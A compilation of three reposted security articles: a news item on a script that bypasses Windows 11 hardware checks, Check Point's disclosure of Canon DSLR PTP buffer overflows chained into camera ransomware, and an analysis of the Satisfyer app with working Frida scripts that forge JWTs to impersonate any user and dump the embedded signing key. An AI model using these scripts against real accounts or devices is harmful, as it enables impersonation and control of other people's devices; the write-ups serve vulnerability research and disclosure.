New Windows 11 install script bypasses TPM, system requirements

New Windows 11 install script bypasses TPM, system requirements

Original text by Lawrence Abrams

A new script allows you to install Windows 11 on devices with incompatible hardware, such as missing TPM 2.0, incompatible CPUs, or the lack of Secure Boot. Even better, the script also works on virtual machines, allowing you to upgrade to the latest Windows Insider build.

When Windows 11 was first announced, Microsoft released the operating system’s new system requirements, which included a TPM 2.0 security processor, Secure Boot, newer CPUs, and at least 64 GB of hard drive space.

As Microsoft realized that many people, especially those in the enterprise, would be testing Windows 11 preview builds on virtual machines, they exempted them from the system requirements.

However, Microsoft is now requiring compatible hardware even on virtual machines and taking a firm stance on its system requirement, going as far as to say that people who install Windows 11 on incompatible hardware may not get security updates.

For those willing to risk running Windows 11 on incompatible hardware, a script has been released that allows new installations and upgrades to bypass the operating system’s system requirements.

Script bypasses Windows 11 system requirements

This new script was released as part of the extremely useful Universal MediaCreationTool wrapper, a batch file that allows you to create an ISO for any version of Windows 10, with Windows 11 support added last week.

Universal MediaCreationTool wrapper
Source: BleepingComputer

While the main script of this open-source project is the ‘MediaCreationTool.bat‘ used to create Windows ISOs, it also includes a script named ‘Skip_TPM_Check_on_Dynamic_Update.cmd,’ which configures the device to bypass compatible hardware checks.

When executed on a Windows 10 or Windows 11 device, the Skip_TPM_Check_on_Dynamic_Update.cmd script will perform a variety of tasks, including:

  • Create the ‘AllowUpgradesWithUnsupportedTPMOrCPU‘ value under the HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup Registry key and set it to 1.
  • Registers a WMI event subscription named ‘Skip TPM Check on Dynamic Update’ that deletes the ‘C:\$WINDOWS.~BT\appraiserres.dll‘ file when the vdsldr.exe executable is launched during Windows 11 setup.It should be noted that the created WMI event subscription will remain in effect until you run the Skip_TPM_Check_on_Dynamic_Update.cmd script again, which will cause the event subscriptions to be deleted. You can do this after installing or upgrading Windows 11.

Before using this script, when attempting to upgrade a Windows 11 build 22449 virtual machine to the latest preview build, the upgrade failed as the setup could not see the secure boot feature, a TPM 2.0 processor, and the system disk was too small.

Windows 11 setup failing on incompatible hardware
Source: BleepingComputer

However, after running this script, we could install the latest Windows 11 preview build 22463 without a problem.

Windows 11 preview build 22463 installed in VirtualBox

Anyone who decides to use this bypass should be aware that this is an unsupported method to install Windows 11 and could lead to performance issues or other bugs when using the operating system. Furthermore, Microsoft may not provide security updates to unsupported devices, so your installation will likely be less secure.

Therefore, you should only use this method in test environments and not on production devices.

Say Cheese: Ransomware-ing a DSLR Camera

Say Cheese: Ransomware-ing a DSLR Camera

Original text by Eyal Itkin

Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us.

In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware?

And the answer is: Yes.

Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment.

Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how would you respond if attackers inject ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay ransom.

Below is a Video Demonstration of this attack:

Picture Transfer Protocol (PTP)

Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware.

Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol that was accessible only to the USB connected devices, is now also PTP/IP that is accessible to every WiFi-enabled device in close proximity.

In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim.

In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options.

From an attacker’s perspective, the PTP layer looks like a great target:

  • PTP is an unauthenticated protocol that supports dozens of different complex commands.
  • Vulnerability in PTP can be equally exploited over USB and over WiFi.
  • The WiFi support makes our cameras more accessible to nearby attackers.

In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers:

  • USB – For an attacker that took over your PC, and now wants to propagate into your camera.
  • WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera.

In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including:

Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs.

Attackers are profit-maximisers, they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file in the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially be a hint of the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file.

Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added costs of key management implications for the vendor.

Feeling stuck, we went back to Google, and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted.

Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere in the internet. Yet another dead end.

The next thing to check was if ML ported their software to our camera model, on the chance it contains debugging functionality that will help us dump the firmware. Although such a port has yet to be released, while reading through their forums and Wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that once loaded, dumps the memory of the camera into the SD Card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM Dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera.

Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

  • The PTP layer is command-based, and every command has a unique numeric opcode.
  • The firmware contains many indicative strings, which eases the task of reverse-engineering it.
Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context:

Figure 4 – Decompiled PTP handler, using the ptp_context object.

As we can see, the context contains function pointers that are used for:

  • Querying about the size of the incoming message.
  • Receiving the incoming message.
  • Sending back the response after handling the message.

It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands.

Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100c

Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the SendObjectInfo handler.

This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the pKeywordsStringUnicode field into an arbitrary value, and later trigger a call to free it.

This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler.

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest.

CVE-2019-5999– Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the BLERequest handler.

We now have 3 similar vulnerabilities:

  • Buffer Overflow over a global structure.
  • Buffer Overflow over the stack.
  • Buffer Overflow over the heap.

As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup.

Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.”

Figure 8 – Crash screen we received when we tested our exploit PoCs.

Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development.

Basic recap of our tools thus far: Our camera has no debugger or ML on it. The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started.

Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it.

We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution.

Loading Scout

Scout is my goto debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we can use a file loader that will load Scout from the SD Card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for them both.

After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi.

We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth.

We went back to the drawing-board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000– Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the SendHostInfo handler

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial. Illegal packets will only be logged, but not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊

Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command.

CVE-2019-6001– Buffer Overflow in SetAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.

Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler.

In this case, the stack buffer is rather small, so we will continue using the previous vulnerability.

Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better that we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting back a malicious firmware update and then signing it so it will pass the verification checks.

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know what are the correct signatures for each part in the firmware update file, effectively gaining a signing primitive by the camera itself.

Since we only have one camera, this was a tricky part. We want to test our own custom home-made firmware update file, but we don’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper.

Figure 11 – Image of our customized ROM Dumper, using our header.

CVE-2019-5995 – Silent malicious firmware update:

There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file.

Wrapping it up

After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user.

Chaining everything together requires the attacker to first set-up a rogue WiFi Access Point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect. Once the attacker is within the same LAN as the camera, he can initiate the exploit.

Here is a video presentation of our exploit and ransomware.

Disclosure Timeline

  • 31 March 2019 – Vulnerabilities were reported to Canon.
  • 14 May 2019 – Canon confirmed all of our vulnerabilities.
  • From this point onward, both parties worked together to patch the vulnerabilities.
  • 08 July 2019 – We verified and approved Canon’s patch.
  • 06 August 2019 – Canon published the patch as part of an official security advisory.

Canon’s Security Advisory

Here are the links to the official security advisory that was published by Canon:

We strongly recommend everyone to patch their affected cameras.

Conclusion

During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well.

Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and wide-spread consumer audience makes cameras a lucrative target for attackers.

A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers.

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Original text by bananamafia

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I’ve re-discovered the butthax talk which covered security aspects of Lovense devices. I’ve felt so inspired, that I’ve decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

  • Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
  • Create an account, find new friends and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use this app. Well OK.
  • Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
  • Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Let’s start with some simple things first.

Bluetooth Communication

Communication between an Android device and a Satisfyer is handled via Bluetooth LE. The app implements many Controller classes for various tasks, like handling low battery status or controlling the device’s vibration. For example, the ToyHolderController class, like many others, implements the sendBuffer() method to send byte buffers to the device. The buffer contents can be logged with the following Frida script:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        console.log("[*] sendBuffer(lst<byte>)");

        var stringbuilder = stringbuilderclazz.$new();
        stringbuilder.append(lst);
        console.log("Buffer: " + stringbuilder.toString());

        // call original
        this.sendBuffer(lst);

    }
});

Which yields:

[*] sendBuffer(lst<byte>)
Buffer: [[33, 33, 33, 33], [25, 25, 25, 25]]

Each list is associated to a specific motor of a Satisfyer. The values in a list control the vibration levels for a specific time frame.

It seems that 66 is the maximum value for the vibration level. As an example how the communication could be manipulated with Frida, I’ve decided to modify the list of bytes sent to the device to use the value 100 instead:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');
    var listclazz = Java.use("java.util.List");
    var arrayclazz = Java.use("java.util.Arrays");

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        // create a new byte array containing the value 100
        var byteList = Java.use('java.util.ArrayList').$new();
        var theByte = Java.use('java.lang.Byte').valueOf(100);
        byteList.add(theByte);
        byteList.add(theByte);
        byteList.add(theByte);
        byteList.add(theByte);

        lst.set(0, byteList);
        lst.set(1, byteList);

        var stringbuilder = stringbuilderclazz.$new();
        stringbuilder.append(lst);
        console.log("Buffer: " + stringbuilder.toString());

        // call the original method with the modified parameter
        this.sendBuffer(lst);

    }
});

This worked and changed the scripts output to:

[*] sendBuffer(lst<byte>)
Buffer: [[100, 100, 100, 100], [100, 100, 100, 100]]

Passing negative values, too long lists or things like that caused the device to ignore these input values.

At this point, other commands sent to the Satisfyer could be altered as well. As can be seen, the easiest way to perform this kind of manipulation is changing values before passing them to the low-level functions of the Bluetooth stack.

Internet Communication

I’ve analyzed the API and authentication flow using decompiled code and Burp. To make this work, I’ve utilized the Universal Android SSL Pinning Bypass script.

JWT Authentication

Each request sent to the server has to be authenticated using a JWT. It’s interesting that the client and not the server is responsible for generating the initial JWT:

public final class JwtTokenBuilder {
    public JwtTokenBuilder() {
        System.loadLibrary("native-lib");
    }

    [...]

    private final native String getReleaseKey();

    public final String createJwtToken() {
        Date date = new Date(new Date().getTime() + (long)86400000);
        Object object = "prod".hashCode() != 3449687 ? this.getDevKey() : this.getReleaseKey();
        Charset charset = d.a;
        if (object != null) {
            object = ((String)object).getBytes(charset);
            l.b(object, "(this as java.lang.String).getBytes(charset)");
            object = Keys.hmacShaKeyFor((byte[])object);
            object = Jwts.builder().setSubject("Satisfyer").claim("auth", "ROLE_ANONYMOUS_CLIENT").signWith((Key)object).setExpiration(date).compact();
            [...]
            return object;
        }
        [...];
    }
}

As can be seen, createJwtToken() uses a JWT signing key originating from a native library called libnative-lib.so. It then signs and uses JWTs like the following:

{
   "alg":"HS512"
}.{
   "sub":"Satisfyer",
   "auth":"ROLE_ANONYMOUS_CLIENT",
   "exp":1624144087
}

After reviewing the authentication flow, I’ve determined that there exist (at least) these roles:

  • ROLE_ANONYMOUS_CLIENT is any client that communicates with the Satisfyer API and is not logged in.
  • ROLE_USER is a client that has successfully logged in. Ever API request is scoped to information that’s accessible to this specific user account.

An authentication token for a signed in user looks as follows:

{
   "alg":"HS512"
}.{
   "sub":"DieterBohlen1337",
   "auth":"ROLE_USER",
   "user_id":282[...],
   "exp":1624194072
}

While the Android app is responsible for generating the initial JWT with role ROLE_ANONYMOUS_CLIENT, the server responds with a new JWT after successfully performing a login. This new JWT uses the role ROLE_USER, as can be seen above.

Would it be possible to use the signing key residing in the shared library to not just sign JWTs with ROLE_ANONYMOUS_CLIENT, but also with ROLE_USER? This would let an attacker to interact with the API in the name of someone else. Let’s find out.

Determining the User ID of a Victim

We need two things to forge a JWT for any given account:

  • The account name
  • The user ID of the account

Starting from an account name, determining the user ID is as simple as searching for the account using this API endpoint:

User Search

This can be done by any user with a valid session as ROLE_USER. Please note the value of the statusDescription in the server’s response.

Creating Forged JWTs with Frida

See, I’m lazy banana man. So instead of dumping the key and creating the JWT myself, I’ve used Frida to instrument the Satisfyer app to do this for me instead.

The app uses a class implementing the JwtBuilder interface to create and sign JWTs. The only class implementing this interface is DefaultJwtBuilder, so I’ve added hooks in there. The plan is as follows:

  • Add a hook to change the auth claim from ROLE_ANONYMOUS_USER to ROLE_USER.
  • Add a hook to add another claim called user_id, indicating the desired user ID of the victim’s account.
  • Change the JWT subject (sub) from Satisfyer (as it’s used for anonymous users) to the account name of the victim.

I came up with this Frida script:

Java.perform(function() {
    var clazz = Java.use("io.jsonwebtoken.impl.DefaultJwtBuilder");
    clazz.claim.overload("java.lang.String", "java.lang.Object").implementation = function(name, val) {
        console.log("[*] Entered claim()");

        var Integer = Java.use("java.lang.Integer");

        // the user ID of the victim
        var intInstance = Integer.valueOf(282[...]);

        // modify the "auth" claim and add another claim for "user_id"
        var res = this.claim(name, "ROLE_USER").claim("user_id", intInstance);

        return res;
    }

    var clazz = Java.use("io.jsonwebtoken.impl.DefaultClaims");
    clazz.setSubject.overload("java.lang.String").implementation = function(sub) {
        console.log("[*] Entered setSubject()");

        // modify the subject from "Satisfyer" (anonymous user) to the victim's user name
        return this.setSubject("victim[...]");
    }

    // Trigger JWT generation
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    console.log("[*] Got Token:");
    console.log(jwtTokenBuilder.createJwtToken());

    console.log("[+] Hooking complete")
});

This worked just fine and generated a forged JWT when starting the app:

$ python3 forge_token.py
[+] Got PID 19213
[*] Entered setSubject()
[*] Entered claim()
[*] Got Token:
eyJhb[...]
[+] Hooking complete

Using the Forged JWT

After creating a JWT for my test account, I’ve simply changed the account’s status message:

Set Status

Checking the status text of the victim revealed that this actually worked 😀

To create this screenshot, I had to use another Frida script to remove the secure flag from the View class which is used to block the ability to take screenshots.

Using the API is fine and all, but I wanted to inject the forged token into the running app, so that I could use features like remote control and calls more easily. I came up with a Frida script to generate and add a forged JWT into the app’s local storage. This happens just before the app is going to check if a valid JWT already exists using the hasToken() method:

var clazz = Java.use("com.coreteka.satisfyer.domain.storage.impl.AuthStorageImpl");
clazz.hasToken.overload().implementation = function() {

    // create new forged token using the hooks described before
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    // createJwtToken() is hooked as well, see above for snippets
    var token = jwtTokenBuilder.createJwtToken();

    // inject token into shared preferences and add bogus values to make the app happy
    this.setToken(token);
    this.setLogin("victim[...]");
    this.setPassword("NotReallyThePassword");
    return this.hasToken();
}

The following demo shows the attacker’s phone on the left and the tablet of another dude on the right. Let’s call that dude Antoine.

  1. The attacker is logged in with some random account that’s not relevant for the attack. This account has no friends.
  2. Antoine has a friend in the friends list called victim. In this case, victim refers to the account that is about to be impersonated.
  3. The Frida script is injected into the attacker’s app. It restarts the app and forges a JWT for the victim account. After that, it gets injected into the session storage. At this point, the attacker impersonates the account of victim.
  4. Suddenly, the attacker has a friend in the friends list. This is the account of Antoine, since victim is a friend of his.
  5. The attacker can now message and call Antoine in the name of victim and could control the Satisfyer of Antoine in the name of victim. For this to work, Antoine has to grant access to the caller first, but since he and victim are friends, that should be totally safe, right?

Fear my video editing skillz.


To summarize, the impact of this is quite interesting, since an attacker can now pose as any given user. Next to the ability to send messages as that user, access to the friends list of this compromised account is now possible as well. This means that, in case someone has granted remote dildo access to the compromised account over the Internet, the attacker could now hijack this and control the Satisfyer of another person. After all, the attacker is able to initiate remote sessions as any user.

In the unlikely event that a victim realizes that their account is being impersonated, even changing the password doesn’t help, since the attack doesn’t even require that to be known.

Note: I’ve only tested and verified this using my own test accounts, I’m not interested in controlling your Satisfyers, sorry.


Possible Mitigation

This issue can be mitigated entirely on the server side, since this is the component responsible for verifying JWT signatures:

  1. Although it’s weird, users that are not logged in could still generate and sign their own JWTs on app startup.
  2. After successful authentication, the server replies with a new JWT that’s valid for the respective user account.
  3. JWTs like this, with roles other than ROLE_ANONYMOUS_CLIENT, should be signed and verified with another key that never leaves the server.

This way, no changes to the app should be required. It wouldn’t be possible to forge JWTs anymore, since now two different signing keys are in use for anonymous and authenticated clients.

Dumping the JWT Signing Key

For completeness sake, I’ve dumped the JWT signing key using various methods. This key can then be used in external applications to create signed JWTs without relying on Frida and the Android application itself.

The Static Way with radare2

The easiest way is to extract the key statically:

$ r2 -A libnative-lib.so
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[x] Analyze all flags starting with sym. and entry0 (aa)
[...]
[0x000009bc]> afl
[...]
0x00000b40    1 20           sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[...]
[0x00000a98]> s sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000b40]> pdf
            ; UNKNOWN XREF from section..dynsym @ +0x98
┌ 20: sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey (int64_t arg1);
│           ; arg int64_t arg1 @ x0
│           0x00000b40      080040f9       ldr x8, [x0]                ; 0xc7 ; load from memory to register; arg1
│           0x00000b44      01000090       adrp x1, 0
│           0x00000b48      210c2191       add x1, x1, str.7fe6a81597158366[...] ; 0x843 ; "7fe6a81597158366[...]" ; add two values
│           0x00000b4c      029d42f9       ldr x2, [x8, 0x538]         ; 0xcf ; load from memory to register
└           0x00000b50      40001fd6       br x2
[0x00000b40]> pxq @ 0x843
0x00000843  0x3531386136656637  0x3636333835313739   7fe6a81597158366
[...]

As you can see, a static key is loaded from address 0x843.

That was too easy, let’s check other methods to dump the key.

The Dynamic Way with Frida

As can be seen in one of the listings above, the Java method getReleaseKey() is declared as native. This means that the implementation of this function is present in a shared library that contains native code.

Calling things from the Java world into the native layer happens via JNI. Instead of bothering with the actual native implementation, Frida can be used to just call the native Java method and dump the returned value. This can be accomplished with the following script:

var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
var jwtTokenBuilder = JwtTokenBuilderClass.$new();
console.log("Release Key: " + jwtTokenBuilder.getReleaseKey());

Another way is to use the Frida Interceptor to print the value returned by the getReleaseKey() export of the native library, outside of the Java layer:

Interceptor.attach(Module.findExportByName("libnative-lib.so", "Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey"),{
    onEnter: hookEnter,
    onLeave: hookLeave
});


function hookEnter(args) {
    console.log("[*] Enter getReleaseKey()");
}

function hookLeave(ret) {
    console.log("[*] Leave getReleaseKey()");
    console.log(ret);

    /*
    // if it would return a byte[] instead of String, one could use:

    // cast ret as byte[]
    var buffer = Java.array('byte', ret);
    var result = "";
    for(var i = 0; i < buffer.length; ++i){
        result += (String.fromCharCode(buffer[i]));
    }*/
}

An Alternative Way using r2Frida

Let’s just assume that there are more complex things going on than simply returning a hardcoded string. A neat way to debug and trace the key generation would involve using r2Frida to dump memory and register contents when executing specific instructions. In this specific case, the contents of the x1 register at offset 0xb4c are of interest.

The plan is as follows:

  • Attach to the running app with r2Frida
  • Get the base address of the shared library
  • Add the offset 0xb4c to this address
  • Add a trace command for this address to dump the contents of the x1 register
  • Trigger the key generation

Let’s see how it works

After triggering the generation of a JWT, tracing kicks in and dumps the value of x1, which is a pointer to the hardcoded string.


